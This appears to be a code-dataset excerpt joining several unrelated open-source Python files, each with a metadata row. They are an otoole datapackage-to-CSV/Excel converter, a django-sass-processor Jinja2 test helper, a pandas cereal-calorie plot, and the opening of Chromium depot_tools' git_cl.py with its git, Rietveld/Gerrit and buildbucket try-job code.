self, df: pd.DataFrame, parameter_name: str, handle: TextIO, default: float
) -> pd.DataFrame:
"""Write parameter data"""
raise NotImplementedError()
@abstractmethod
def _write_set(self, df: pd.DataFrame, set_name, handle: TextIO) -> pd.DataFrame:
"""Write set data"""
raise NotImplementedError()
@abstractmethod
def _footer(self, handle: TextIO):
raise NotImplementedError()
class DataPackageToCsv(DataPackageTo):
def _header(self):
filepath = open(self.datafilepath, "w")
msg = "# Model file written by *otoole*\n"
filepath.write(msg)
return filepath
def _form_parameter(self, df: pd.DataFrame, default: float):
df = df[df.VALUE != default]
return df
def _write_parameter(
self, df: pd.DataFrame, parameter_name: str, handle: TextIO, default: float
):
"""Write parameter data to a csv file, omitting data which matches the default value
Arguments
---------
        df : pandas.DataFrame
        parameter_name : str
        handle : TextIO
        default : float
"""
df = self._form_parameter(df, default)
handle.write("param default {} : {} :=\n".format(default, parameter_name))
df.to_csv(path_or_buf=handle, sep=" ", header=False, index=False)
handle.write(";\n")
def _write_set(self, df: pd.DataFrame, set_name, handle: TextIO):
"""
Arguments
---------
df : pandas.DataFrame
set_name : str
handle: TextIO
"""
handle.write("set {} :=\n".format(set_name))
df.to_csv(path_or_buf=handle, sep=" ", header=False, index=False)
handle.write(";\n")
def _footer(self, handle: TextIO):
handle.write("end;\n")
handle.close()
class DataPackageToExcel(DataPackageTo):
def _header(self):
return pd.ExcelWriter(self.datafilepath, mode="w")
def _form_parameter(
self, df: pd.DataFrame, parameter_name: str, default: float
) -> pd.DataFrame:
"""Converts data into wide format
Arguments
---------
df: pd.DataFrame
parameter_name: str
default: float
Returns
-------
pandas.DataFrame
"""
if not df.empty:
names = df.columns.to_list()
if len(names) > 2:
logger.debug(
"More than 2 columns for {}: {}".format(parameter_name, names)
)
rows = names[0:-2]
columns = names[-2]
values = names[-1]
logger.debug("Rows: {}; columns: {}; values: {}", rows, columns, values)
logger.debug("dtypes: {}".format(df.dtypes))
pivot = pd.pivot_table(
df, index=rows, columns=columns, values=values, fill_value=default
)
elif len(names) == 2:
logger.debug("Two columns for {}: {}".format(parameter_name, names))
values = names[-1]
rows = names[0:-2]
logger.debug("Rows: {}; values: {}", rows, values)
pivot = pd.pivot_table(
df, index=rows, values=values, fill_value=default
)
else:
logger.debug("One column for {}: {}".format(parameter_name, names))
pivot = df.copy()
pivot = pivot.reset_index(drop=True)
else:
logger.debug("Dataframe {} is empty".format(parameter_name))
pivot = df.copy()
return pivot
def _write_parameter(
self,
df: pd.DataFrame,
parameter_name: str,
handle: pd.ExcelWriter,
default: float,
):
df = self._form_parameter(df, parameter_name, default)
df.to_excel(handle, sheet_name=parameter_name, merge_cells=False)
def _write_set(self, df: pd.DataFrame, set_name, handle: pd.ExcelWriter):
df.to_excel(handle, sheet_name=set_name, merge_cells=False, index=False)
def _footer(self, handle=pd.ExcelWriter):
handle.close()
def convert_datapackage_to_datafile(path_to_datapackage, path_to_datafile):
dp = DataPackageToCsv(path_to_datapackage, path_to_datafile)
dp.convert()
def convert_datapackage_to_excel(path_to_datapackage, path_to_excel):
dp = DataPackageToExcel(path_to_datapackage, path_to_excel)
dp.convert()
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
path_to_datapackage = sys.argv[1]
path_to_datafile = sys.argv[2]
DataPackageToCsv(path_to_datapackage, path_to_datafile)
| 30.425 | 92 | 0.598877 | [
"MIT"
] | chrwm/otoole | src/otoole/preprocess/narrow_to_datafile.py | 7,302 | Python |
from __future__ import absolute_import
from jinja2 import Environment
def environment(**kwargs):
extensions = [] if 'extensions' not in kwargs else kwargs['extensions']
extensions.append('sass_processor.jinja2.ext.SassSrc')
kwargs['extensions'] = extensions
return Environment(**kwargs)
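# Illustrative only: in a Django settings module this environment factory is
# typically referenced by dotted path from the Jinja2 template backend, e.g.
# (assuming this module is importable as ``tests.jinja2``):
#
#   TEMPLATES = [{
#       'BACKEND': 'django.template.backends.jinja2.Jinja2',
#       'DIRS': [],
#       'APP_DIRS': True,
#       'OPTIONS': {'environment': 'tests.jinja2.environment'},
#   }]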
| 25.583333 | 75 | 0.749186 | [
"MIT"
] | AstraLuma/django-sass-processor | tests/jinja2.py | 307 | Python |
# Data from https://www.kaggle.com/crawford/80-cereals/version/2
import pandas, matplotlib
data = pandas.read_csv('http://www.compassmentis.com/wp-content/uploads/2019/04/cereal.csv')
data = data.set_index('name')
data = data.calories.sort_values()[-10:]
ax = data.plot(kind='barh')
ax.set_xlabel('Calories per serving')
ax.set_ylabel('Cereal')
ax.set_title('Top 10 cereals by calories')
matplotlib.pyplot.subplots_adjust(left=0.25)
matplotlib.pyplot.show()
| 38.166667 | 92 | 0.766376 | [
"MIT"
] | CompassMentis/practical_python_in_10_lines | read_csv_and_plot/read_and_plot.py | 458 | Python |
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Copyright (C) 2008 Evan Martin <[email protected]>
"""A git-command for integrating reviews on Rietveld and Gerrit."""
from __future__ import print_function
from distutils.version import LooseVersion
from multiprocessing.pool import ThreadPool
import base64
import collections
import glob
import httplib
import json
import logging
import multiprocessing
import optparse
import os
import re
import stat
import sys
import textwrap
import time
import traceback
import urllib
import urllib2
import urlparse
import uuid
import webbrowser
import zlib
try:
import readline # pylint: disable=F0401,W0611
except ImportError:
pass
from third_party import colorama
from third_party import httplib2
from third_party import upload
import auth
from luci_hacks import trigger_luci_job as luci_trigger
import clang_format
import commit_queue
import dart_format
import setup_color
import fix_encoding
import gclient_utils
import gerrit_util
import git_cache
import git_common
import git_footers
import owners
import owners_finder
import presubmit_support
import rietveld
import scm
import subcommand
import subprocess2
import watchlists
__version__ = '2.0'
COMMIT_BOT_EMAIL = '[email protected]'
DEFAULT_SERVER = 'https://codereview.appspot.com'
POSTUPSTREAM_HOOK_PATTERN = '.git/hooks/post-cl-%s'
DESCRIPTION_BACKUP_FILE = '~/.git_cl_description_backup'
GIT_INSTRUCTIONS_URL = 'http://code.google.com/p/chromium/wiki/UsingGit'
REFS_THAT_ALIAS_TO_OTHER_REFS = {
'refs/remotes/origin/lkgr': 'refs/remotes/origin/master',
'refs/remotes/origin/lkcr': 'refs/remotes/origin/master',
}
# Valid extensions for files we want to lint.
DEFAULT_LINT_REGEX = r"(.*\.cpp|.*\.cc|.*\.h)"
DEFAULT_LINT_IGNORE_REGEX = r"$^"
# Shortcut since it quickly becomes redundant.
Fore = colorama.Fore
# Initialized in main()
settings = None
def DieWithError(message):
print(message, file=sys.stderr)
sys.exit(1)
def GetNoGitPagerEnv():
env = os.environ.copy()
# 'cat' is a magical git string that disables pagers on all platforms.
env['GIT_PAGER'] = 'cat'
return env
def RunCommand(args, error_ok=False, error_message=None, shell=False, **kwargs):
try:
return subprocess2.check_output(args, shell=shell, **kwargs)
except subprocess2.CalledProcessError as e:
logging.debug('Failed running %s', args)
if not error_ok:
DieWithError(
'Command "%s" failed.\n%s' % (
' '.join(args), error_message or e.stdout or ''))
return e.stdout
def RunGit(args, **kwargs):
"""Returns stdout."""
return RunCommand(['git'] + args, **kwargs)
def RunGitWithCode(args, suppress_stderr=False):
"""Returns return code and stdout."""
try:
if suppress_stderr:
stderr = subprocess2.VOID
else:
stderr = sys.stderr
out, code = subprocess2.communicate(['git'] + args,
env=GetNoGitPagerEnv(),
stdout=subprocess2.PIPE,
stderr=stderr)
return code, out[0]
except ValueError:
# When the subprocess fails, it returns None. That triggers a ValueError
# when trying to unpack the return value into (out, code).
return 1, ''
def RunGitSilent(args):
"""Returns stdout, suppresses stderr and ignores the return code."""
return RunGitWithCode(args, suppress_stderr=True)[1]
def IsGitVersionAtLeast(min_version):
prefix = 'git version '
version = RunGit(['--version']).strip()
return (version.startswith(prefix) and
LooseVersion(version[len(prefix):]) >= LooseVersion(min_version))
def BranchExists(branch):
"""Return True if specified branch exists."""
code, _ = RunGitWithCode(['rev-parse', '--verify', branch],
suppress_stderr=True)
return not code
def ask_for_data(prompt):
try:
return raw_input(prompt)
except KeyboardInterrupt:
# Hide the exception.
sys.exit(1)
def git_set_branch_value(key, value):
branch = GetCurrentBranch()
if not branch:
return
cmd = ['config']
if isinstance(value, int):
cmd.append('--int')
git_key = 'branch.%s.%s' % (branch, key)
RunGit(cmd + [git_key, str(value)])
def git_get_branch_default(key, default):
branch = GetCurrentBranch()
if branch:
git_key = 'branch.%s.%s' % (branch, key)
(_, stdout) = RunGitWithCode(['config', '--int', '--get', git_key])
try:
return int(stdout.strip())
except ValueError:
pass
return default
def add_git_similarity(parser):
parser.add_option(
'--similarity', metavar='SIM', type='int', action='store',
help='Sets the percentage that a pair of files need to match in order to'
' be considered copies (default 50)')
parser.add_option(
'--find-copies', action='store_true',
help='Allows git to look for copies.')
parser.add_option(
'--no-find-copies', action='store_false', dest='find_copies',
help='Disallows git from looking for copies.')
old_parser_args = parser.parse_args
def Parse(args):
options, args = old_parser_args(args)
if options.similarity is None:
options.similarity = git_get_branch_default('git-cl-similarity', 50)
else:
print('Note: Saving similarity of %d%% in git config.'
% options.similarity)
git_set_branch_value('git-cl-similarity', options.similarity)
options.similarity = max(0, min(options.similarity, 100))
if options.find_copies is None:
options.find_copies = bool(
git_get_branch_default('git-find-copies', True))
else:
git_set_branch_value('git-find-copies', int(options.find_copies))
print('Using %d%% similarity for rename/copy detection. '
'Override with --similarity.' % options.similarity)
return options, args
parser.parse_args = Parse
def _get_properties_from_options(options):
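  """Parses 'key=value' property options into a dict.
  Values are JSON-decoded when possible, e.g. ['foo=1', 'bar=baz'] becomes
  {'foo': 1, 'bar': 'baz'}; anything that is not valid JSON stays a string.
  """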
properties = dict(x.split('=', 1) for x in options.properties)
for key, val in properties.iteritems():
try:
properties[key] = json.loads(val)
except ValueError:
pass # If a value couldn't be evaluated, treat it as a string.
return properties
def _prefix_master(master):
"""Convert user-specified master name to full master name.
  Buildbucket uses the full master name (master.tryserver.chromium.linux) as the
  bucket name, while developers always use the shortened master name
(tryserver.chromium.linux) by stripping off the prefix 'master.'. This
function does the conversion for buildbucket migration.
"""
prefix = 'master.'
if master.startswith(prefix):
return master
return '%s%s' % (prefix, master)
def _buildbucket_retry(operation_name, http, *args, **kwargs):
"""Retries requests to buildbucket service and returns parsed json content."""
try_count = 0
while True:
response, content = http.request(*args, **kwargs)
try:
content_json = json.loads(content)
except ValueError:
content_json = None
# Buildbucket could return an error even if status==200.
if content_json and content_json.get('error'):
error = content_json.get('error')
if error.get('code') == 403:
raise BuildbucketResponseException(
'Access denied: %s' % error.get('message', ''))
msg = 'Error in response. Reason: %s. Message: %s.' % (
error.get('reason', ''), error.get('message', ''))
raise BuildbucketResponseException(msg)
if response.status == 200:
if not content_json:
raise BuildbucketResponseException(
'Buildbucket returns invalid json content: %s.\n'
'Please file bugs at http://crbug.com, label "Infra-BuildBucket".' %
content)
return content_json
if response.status < 500 or try_count >= 2:
raise httplib2.HttpLib2Error(content)
# status >= 500 means transient failures.
logging.debug('Transient errors when %s. Will retry.', operation_name)
time.sleep(0.5 + 1.5*try_count)
try_count += 1
assert False, 'unreachable'
def trigger_luci_job(changelist, masters, options):
"""Send a job to run on LUCI."""
issue_props = changelist.GetIssueProperties()
issue = changelist.GetIssue()
patchset = changelist.GetMostRecentPatchset()
for builders_and_tests in sorted(masters.itervalues()):
# TODO(hinoka et al): add support for other properties.
# Currently, this completely ignores testfilter and other properties.
for builder in sorted(builders_and_tests):
luci_trigger.trigger(
builder, 'HEAD', issue, patchset, issue_props['project'])
def trigger_try_jobs(auth_config, changelist, options, masters, category):
rietveld_url = settings.GetDefaultServerUrl()
rietveld_host = urlparse.urlparse(rietveld_url).hostname
authenticator = auth.get_authenticator_for_host(rietveld_host, auth_config)
http = authenticator.authorize(httplib2.Http())
http.force_exception_to_status_code = True
issue_props = changelist.GetIssueProperties()
issue = changelist.GetIssue()
patchset = changelist.GetMostRecentPatchset()
properties = _get_properties_from_options(options)
buildbucket_put_url = (
'https://{hostname}/_ah/api/buildbucket/v1/builds/batch'.format(
hostname=options.buildbucket_host))
buildset = 'patch/rietveld/{hostname}/{issue}/{patch}'.format(
hostname=rietveld_host,
issue=issue,
patch=patchset)
batch_req_body = {'builds': []}
print_text = []
print_text.append('Tried jobs on:')
for master, builders_and_tests in sorted(masters.iteritems()):
print_text.append('Master: %s' % master)
bucket = _prefix_master(master)
for builder, tests in sorted(builders_and_tests.iteritems()):
print_text.append(' %s: %s' % (builder, tests))
parameters = {
'builder_name': builder,
'changes': [{
'author': {'email': issue_props['owner_email']},
'revision': options.revision,
}],
'properties': {
'category': category,
'issue': issue,
'master': master,
'patch_project': issue_props['project'],
'patch_storage': 'rietveld',
'patchset': patchset,
'reason': options.name,
'rietveld': rietveld_url,
},
}
if 'presubmit' in builder.lower():
parameters['properties']['dry_run'] = 'true'
if tests:
parameters['properties']['testfilter'] = tests
if properties:
parameters['properties'].update(properties)
if options.clobber:
parameters['properties']['clobber'] = True
batch_req_body['builds'].append(
{
'bucket': bucket,
'parameters_json': json.dumps(parameters),
'client_operation_id': str(uuid.uuid4()),
'tags': ['builder:%s' % builder,
'buildset:%s' % buildset,
'master:%s' % master,
'user_agent:git_cl_try']
}
)
_buildbucket_retry(
'triggering tryjobs',
http,
buildbucket_put_url,
'PUT',
body=json.dumps(batch_req_body),
headers={'Content-Type': 'application/json'}
)
print_text.append('To see results here, run: git cl try-results')
print_text.append('To see results in browser, run: git cl web')
print('\n'.join(print_text))
def fetch_try_jobs(auth_config, changelist, options):
"""Fetches tryjobs from buildbucket.
Returns a map from build id to build info as json dictionary.
"""
rietveld_url = settings.GetDefaultServerUrl()
rietveld_host = urlparse.urlparse(rietveld_url).hostname
authenticator = auth.get_authenticator_for_host(rietveld_host, auth_config)
if authenticator.has_cached_credentials():
http = authenticator.authorize(httplib2.Http())
else:
print('Warning: Some results might be missing because %s' %
# Get the message on how to login.
(auth.LoginRequiredError(rietveld_host).message,))
http = httplib2.Http()
http.force_exception_to_status_code = True
buildset = 'patch/rietveld/{hostname}/{issue}/{patch}'.format(
hostname=rietveld_host,
issue=changelist.GetIssue(),
patch=options.patchset)
params = {'tag': 'buildset:%s' % buildset}
builds = {}
while True:
url = 'https://{hostname}/_ah/api/buildbucket/v1/search?{params}'.format(
hostname=options.buildbucket_host,
params=urllib.urlencode(params))
content = _buildbucket_retry('fetching tryjobs', http, url, 'GET')
for build in content.get('builds', []):
builds[build['id']] = build
if 'next_cursor' in content:
params['start_cursor'] = content['next_cursor']
else:
break
return builds
def print_tryjobs(options, builds):
"""Prints nicely result of fetch_try_jobs."""
if not builds:
print('No tryjobs scheduled')
return
# Make a copy, because we'll be modifying builds dictionary.
builds = builds.copy()
builder_names_cache = {}
def get_builder(b):
try:
return builder_names_cache[b['id']]
except KeyError:
try:
parameters = json.loads(b['parameters_json'])
name = parameters['builder_name']
except (ValueError, KeyError) as error:
print('WARNING: failed to get builder name for build %s: %s' % (
b['id'], error))
name = None
builder_names_cache[b['id']] = name
return name
def get_bucket(b):
bucket = b['bucket']
if bucket.startswith('master.'):
return bucket[len('master.'):]
return bucket
if options.print_master:
name_fmt = '%%-%ds %%-%ds' % (
max(len(str(get_bucket(b))) for b in builds.itervalues()),
max(len(str(get_builder(b))) for b in builds.itervalues()))
def get_name(b):
return name_fmt % (get_bucket(b), get_builder(b))
else:
name_fmt = '%%-%ds' % (
max(len(str(get_builder(b))) for b in builds.itervalues()))
def get_name(b):
return name_fmt % get_builder(b)
def sort_key(b):
return b['status'], b.get('result'), get_name(b), b.get('url')
def pop(title, f, color=None, **kwargs):
"""Pop matching builds from `builds` dict and print them."""
if not options.color or color is None:
colorize = str
else:
colorize = lambda x: '%s%s%s' % (color, x, Fore.RESET)
result = []
for b in builds.values():
if all(b.get(k) == v for k, v in kwargs.iteritems()):
builds.pop(b['id'])
result.append(b)
if result:
print(colorize(title))
for b in sorted(result, key=sort_key):
print(' ', colorize('\t'.join(map(str, f(b)))))
total = len(builds)
pop(status='COMPLETED', result='SUCCESS',
title='Successes:', color=Fore.GREEN,
f=lambda b: (get_name(b), b.get('url')))
pop(status='COMPLETED', result='FAILURE', failure_reason='INFRA_FAILURE',
title='Infra Failures:', color=Fore.MAGENTA,
f=lambda b: (get_name(b), b.get('url')))
pop(status='COMPLETED', result='FAILURE', failure_reason='BUILD_FAILURE',
title='Failures:', color=Fore.RED,
f=lambda b: (get_name(b), b.get('url')))
pop(status='COMPLETED', result='CANCELED',
title='Canceled:', color=Fore.MAGENTA,
f=lambda b: (get_name(b),))
pop(status='COMPLETED', result='FAILURE',
failure_reason='INVALID_BUILD_DEFINITION',
title='Wrong master/builder name:', color=Fore.MAGENTA,
f=lambda b: (get_name(b),))
pop(status='COMPLETED', result='FAILURE',
title='Other failures:',
f=lambda b: (get_name(b), b.get('failure_reason'), b.get('url')))
pop(status='COMPLETED',
title='Other finished:',
f=lambda b: (get_name(b), b.get('result'), b.get('url')))
pop(status='STARTED',
title='Started:', color=Fore.YELLOW,
f=lambda b: (get_name(b), b.get('url')))
pop(status='SCHEDULED',
title='Scheduled:',
f=lambda b: (get_name(b), 'id=%s' % b['id']))
# The last section is just in case buildbucket API changes OR there is a bug.
pop(title='Other:',
f=lambda b: (get_name(b), 'id=%s' % b['id']))
assert len(builds) == 0
print('Total: %d tryjobs' % total)
def MatchSvnGlob(url, base_url, glob_spec, allow_wildcards):
"""Return the corresponding git ref if |base_url| together with |glob_spec|
matches the full |url|.
If |allow_wildcards| is true, |glob_spec| can contain wildcards (see below).
"""
fetch_suburl, as_ref = glob_spec.split(':')
if allow_wildcards:
glob_match = re.match('(.+/)?(\*|{[^/]*})(/.+)?', fetch_suburl)
if glob_match:
# Parse specs like "branches/*/src:refs/remotes/svn/*" or
# "branches/{472,597,648}/src:refs/remotes/svn/*".
branch_re = re.escape(base_url)
if glob_match.group(1):
branch_re += '/' + re.escape(glob_match.group(1))
wildcard = glob_match.group(2)
if wildcard == '*':
branch_re += '([^/]*)'
else:
# Escape and replace surrounding braces with parentheses and commas
# with pipe symbols.
wildcard = re.escape(wildcard)
wildcard = re.sub('^\\\\{', '(', wildcard)
wildcard = re.sub('\\\\,', '|', wildcard)
wildcard = re.sub('\\\\}$', ')', wildcard)
branch_re += wildcard
if glob_match.group(3):
branch_re += re.escape(glob_match.group(3))
match = re.match(branch_re, url)
if match:
return re.sub('\*$', match.group(1), as_ref)
# Parse specs like "trunk/src:refs/remotes/origin/trunk".
if fetch_suburl:
full_url = base_url + '/' + fetch_suburl
else:
full_url = base_url
if full_url == url:
return as_ref
return None
def print_stats(similarity, find_copies, args):
"""Prints statistics about the change to the user."""
# --no-ext-diff is broken in some versions of Git, so try to work around
# this by overriding the environment (but there is still a problem if the
# git config key "diff.external" is used).
env = GetNoGitPagerEnv()
if 'GIT_EXTERNAL_DIFF' in env:
del env['GIT_EXTERNAL_DIFF']
if find_copies:
similarity_options = ['--find-copies-harder', '-l100000',
'-C%s' % similarity]
else:
similarity_options = ['-M%s' % similarity]
try:
stdout = sys.stdout.fileno()
except AttributeError:
stdout = None
return subprocess2.call(
['git',
'diff', '--no-ext-diff', '--stat'] + similarity_options + args,
stdout=stdout, env=env)
class BuildbucketResponseException(Exception):
pass
class Settings(object):
def __init__(self):
self.default_server = None
self.cc = None
self.root = None
self.is_git_svn = None
self.svn_branch = None
self.tree_status_url = None
self.viewvc_url = None
self.updated = False
self.is_gerrit = None
self.squash_gerrit_uploads = None
self.gerrit_skip_ensure_authenticated = None
self.git_editor = None
self.project = None
self.force_https_commit_url = None
self.pending_ref_prefix = None
def LazyUpdateIfNeeded(self):
"""Updates the settings from a codereview.settings file, if available."""
if not self.updated:
# The only value that actually changes the behavior is
# autoupdate = "false". Everything else means "true".
autoupdate = RunGit(['config', 'rietveld.autoupdate'],
error_ok=True
).strip().lower()
cr_settings_file = FindCodereviewSettingsFile()
if autoupdate != 'false' and cr_settings_file:
LoadCodereviewSettingsFromFile(cr_settings_file)
self.updated = True
def GetDefaultServerUrl(self, error_ok=False):
if not self.default_server:
self.LazyUpdateIfNeeded()
self.default_server = gclient_utils.UpgradeToHttps(
self._GetRietveldConfig('server', error_ok=True))
if error_ok:
return self.default_server
if not self.default_server:
error_message = ('Could not find settings file. You must configure '
'your review setup by running "git cl config".')
self.default_server = gclient_utils.UpgradeToHttps(
self._GetRietveldConfig('server', error_message=error_message))
return self.default_server
@staticmethod
def GetRelativeRoot():
return RunGit(['rev-parse', '--show-cdup']).strip()
def GetRoot(self):
if self.root is None:
self.root = os.path.abspath(self.GetRelativeRoot())
return self.root
def GetGitMirror(self, remote='origin'):
"""If this checkout is from a local git mirror, return a Mirror object."""
local_url = RunGit(['config', '--get', 'remote.%s.url' % remote]).strip()
if not os.path.isdir(local_url):
return None
git_cache.Mirror.SetCachePath(os.path.dirname(local_url))
remote_url = git_cache.Mirror.CacheDirToUrl(local_url)
# Use the /dev/null print_func to avoid terminal spew in WaitForRealCommit.
mirror = git_cache.Mirror(remote_url, print_func = lambda *args: None)
if mirror.exists():
return mirror
return None
def GetIsGitSvn(self):
"""Return true if this repo looks like it's using git-svn."""
if self.is_git_svn is None:
if self.GetPendingRefPrefix():
# If PENDING_REF_PREFIX is set then it's a pure git repo no matter what.
self.is_git_svn = False
else:
# If you have any "svn-remote.*" config keys, we think you're using svn.
self.is_git_svn = RunGitWithCode(
['config', '--local', '--get-regexp', r'^svn-remote\.'])[0] == 0
return self.is_git_svn
def GetSVNBranch(self):
if self.svn_branch is None:
if not self.GetIsGitSvn():
DieWithError('Repo doesn\'t appear to be a git-svn repo.')
# Try to figure out which remote branch we're based on.
# Strategy:
# 1) iterate through our branch history and find the svn URL.
# 2) find the svn-remote that fetches from the URL.
# regexp matching the git-svn line that contains the URL.
git_svn_re = re.compile(r'^\s*git-svn-id: (\S+)@', re.MULTILINE)
# We don't want to go through all of history, so read a line from the
# pipe at a time.
# The -100 is an arbitrary limit so we don't search forever.
cmd = ['git', 'log', '-100', '--pretty=medium']
proc = subprocess2.Popen(cmd, stdout=subprocess2.PIPE,
env=GetNoGitPagerEnv())
url = None
for line in proc.stdout:
match = git_svn_re.match(line)
if match:
url = match.group(1)
proc.stdout.close() # Cut pipe.
break
if url:
svn_remote_re = re.compile(r'^svn-remote\.([^.]+)\.url (.*)$')
remotes = RunGit(['config', '--get-regexp',
r'^svn-remote\..*\.url']).splitlines()
for remote in remotes:
match = svn_remote_re.match(remote)
if match:
remote = match.group(1)
base_url = match.group(2)
rewrite_root = RunGit(
['config', 'svn-remote.%s.rewriteRoot' % remote],
error_ok=True).strip()
if rewrite_root:
base_url = rewrite_root
fetch_spec = RunGit(
['config', 'svn-remote.%s.fetch' % remote],
error_ok=True).strip()
if fetch_spec:
self.svn_branch = MatchSvnGlob(url, base_url, fetch_spec, False)
if self.svn_branch:
break
branch_spec = RunGit(
['config', 'svn-remote.%s.branches' % remote],
error_ok=True).strip()
if branch_spec:
self.svn_branch = MatchSvnGlob(url, base_url, branch_spec, True)
if self.svn_branch:
break
tag_spec = RunGit(
['config', 'svn-remote.%s.tags' % remote],
error_ok=True).strip()
if tag_spec:
self.svn_branch = MatchSvnGlob(url, base_url, tag_spec, True)
if self.svn_branch:
break
if not self.svn_branch:
DieWithError('Can\'t guess svn branch -- try specifying it on the '
'command line')
return self.svn_branch
def GetTreeStatusUrl(self, error_ok=False):
if not self.tree_status_url:
error_message = ('You must configure your tree status URL by running '
'"git cl config".')
self.tree_status_url = self._GetRietveldConfig(
'tree-status-url', error_ok=error_ok, error_message=error_message)
return self.tree_status_url
def GetViewVCUrl(self):
if not self.viewvc_url:
self.viewvc_url = self._GetRietveldConfig('viewvc-url', error_ok=True)
return self.viewvc_url
def GetBugPrefix(self):
return self._GetRietveldConfig('bug-prefix', error_ok=True)
def GetIsSkipDependencyUpload(self, branch_name):
"""Returns true if specified branch should skip dep uploads."""
return self._GetBranchConfig(branch_name, 'skip-deps-uploads',
error_ok=True)
def GetRunPostUploadHook(self):
run_post_upload_hook = self._GetRietveldConfig(
'run-post-upload-hook', error_ok=True)
return run_post_upload_hook == "True"
def GetDefaultCCList(self):
return self._GetRietveldConfig('cc', error_ok=True)
def GetDefaultPrivateFlag(self):
return self._GetRietveldConfig('private', error_ok=True)
def GetIsGerrit(self):
"""Return true if this repo is assosiated with gerrit code review system."""
if self.is_gerrit is None:
self.is_gerrit = self._GetConfig('gerrit.host', error_ok=True)
return self.is_gerrit
def GetSquashGerritUploads(self):
"""Return true if uploads to Gerrit should be squashed by default."""
if self.squash_gerrit_uploads is None:
self.squash_gerrit_uploads = self.GetSquashGerritUploadsOverride()
if self.squash_gerrit_uploads is None:
# Default is squash now (http://crbug.com/611892#c23).
self.squash_gerrit_uploads = not (
RunGit(['config', '--bool', 'gerrit.squash-uploads'],
error_ok=True).strip() == 'false')
return self.squash_gerrit_uploads
def GetSquashGerritUploadsOverride(self):
"""Return True or False if codereview.settings should be overridden.
Returns None if no override has been defined.
"""
# See also http://crbug.com/611892#c23
result = RunGit(['config', '--bool', 'gerrit.override-squash-uploads'],
error_ok=True).strip()
if result == 'true':
return True
if result == 'false':
return False
return None
def GetGerritSkipEnsureAuthenticated(self):
"""Return True if EnsureAuthenticated should not be done for Gerrit
uploads."""
if self.gerrit_skip_ensure_authenticated is None:
self.gerrit_skip_ensure_authenticated = (
RunGit(['config', '--bool', 'gerrit.skip-ensure-authenticated'],
error_ok=True).strip() == 'true')
return self.gerrit_skip_ensure_authenticated
def GetGitEditor(self):
"""Return the editor specified in the git config, or None if none is."""
if self.git_editor is None:
self.git_editor = self._GetConfig('core.editor', error_ok=True)
return self.git_editor or None
def GetLintRegex(self):
return (self._GetRietveldConfig('cpplint-regex', error_ok=True) or
DEFAULT_LINT_REGEX)
def GetLintIgnoreRegex(self):
return (self._GetRietveldConfig('cpplint-ignore-regex', error_ok=True) or
DEFAULT_LINT_IGNORE_REGEX)
def GetProject(self):
if not self.project:
self.project = self._GetRietveldConfig('project', error_ok=True)
return self.project
def GetForceHttpsCommitUrl(self):
if not self.force_https_commit_url:
self.force_https_commit_url = self._GetRietveldConfig(
'force-https-commit-url', error_ok=True)
return self.force_https_commit_url
def GetPendingRefPrefix(self):
if not self.pending_ref_prefix:
self.pending_ref_prefix = self._GetRietveldConfig(
'pending-ref-prefix', error_ok=True)
return self.pending_ref_prefix
def _GetRietveldConfig(self, param, **kwargs):
return self._GetConfig('rietveld.' + param, **kwargs)
def _GetBranchConfig(self, branch_name, param, **kwargs):
return self._GetConfig('branch.' + branch_name + '.' + param, **kwargs)
def _GetConfig(self, param, **kwargs):
self.LazyUpdateIfNeeded()
return RunGit(['config', param], **kwargs).strip()
def ShortBranchName(branch):
"""Convert a name like 'refs/heads/foo' to just 'foo'."""
return branch.replace('refs/heads/', '', 1)
def GetCurrentBranchRef():
"""Returns branch ref (e.g., refs/heads/master) or None."""
return RunGit(['symbolic-ref', 'HEAD'],
stderr=subprocess2.VOID, error_ok=True).strip() or None
def GetCurrentBranch():
"""Returns current branch or None.
For refs/heads/* branches, returns just last part. For others, full ref.
"""
branchref = GetCurrentBranchRef()
if branchref:
return ShortBranchName(branchref)
return None
class _CQState(object):
"""Enum for states of CL with respect to Commit Queue."""
NONE = 'none'
DRY_RUN = 'dry_run'
COMMIT = 'commit'
ALL_STATES = [NONE, DRY_RUN, COMMIT]
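  # For Gerrit these map onto Commit-Queue label votes (see
  # _GerritChangelistImpl.SetCQState); for Rietveld only NONE and COMMIT are
  # supported, via the 'commit' flag.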
class _ParsedIssueNumberArgument(object):
def __init__(self, issue=None, patchset=None, hostname=None):
self.issue = issue
self.patchset = patchset
self.hostname = hostname
@property
def valid(self):
return self.issue is not None
class _RietveldParsedIssueNumberArgument(_ParsedIssueNumberArgument):
def __init__(self, *args, **kwargs):
self.patch_url = kwargs.pop('patch_url', None)
super(_RietveldParsedIssueNumberArgument, self).__init__(*args, **kwargs)
def ParseIssueNumberArgument(arg):
"""Parses the issue argument and returns _ParsedIssueNumberArgument."""
fail_result = _ParsedIssueNumberArgument()
if arg.isdigit():
return _ParsedIssueNumberArgument(issue=int(arg))
if not arg.startswith('http'):
return fail_result
url = gclient_utils.UpgradeToHttps(arg)
try:
parsed_url = urlparse.urlparse(url)
except ValueError:
return fail_result
for cls in _CODEREVIEW_IMPLEMENTATIONS.itervalues():
tmp = cls.ParseIssueURL(parsed_url)
if tmp is not None:
return tmp
return fail_result
class Changelist(object):
"""Changelist works with one changelist in local branch.
Supports two codereview backends: Rietveld or Gerrit, selected at object
creation.
Notes:
* Not safe for concurrent multi-{thread,process} use.
* Caches values from current branch. Therefore, re-use after branch change
with care.
"""
def __init__(self, branchref=None, issue=None, codereview=None, **kwargs):
"""Create a new ChangeList instance.
If issue is given, the codereview must be given too.
If `codereview` is given, it must be 'rietveld' or 'gerrit'.
Otherwise, it's decided based on current configuration of the local branch,
with default being 'rietveld' for backwards compatibility.
See _load_codereview_impl for more details.
**kwargs will be passed directly to codereview implementation.
"""
# Poke settings so we get the "configure your server" message if necessary.
global settings
if not settings:
# Happens when git_cl.py is used as a utility library.
settings = Settings()
if issue:
assert codereview, 'codereview must be known, if issue is known'
self.branchref = branchref
if self.branchref:
assert branchref.startswith('refs/heads/')
self.branch = ShortBranchName(self.branchref)
else:
self.branch = None
self.upstream_branch = None
self.lookedup_issue = False
self.issue = issue or None
self.has_description = False
self.description = None
self.lookedup_patchset = False
self.patchset = None
self.cc = None
self.watchers = ()
self._remote = None
self._codereview_impl = None
self._codereview = None
self._load_codereview_impl(codereview, **kwargs)
assert self._codereview_impl
assert self._codereview in _CODEREVIEW_IMPLEMENTATIONS
def _load_codereview_impl(self, codereview=None, **kwargs):
if codereview:
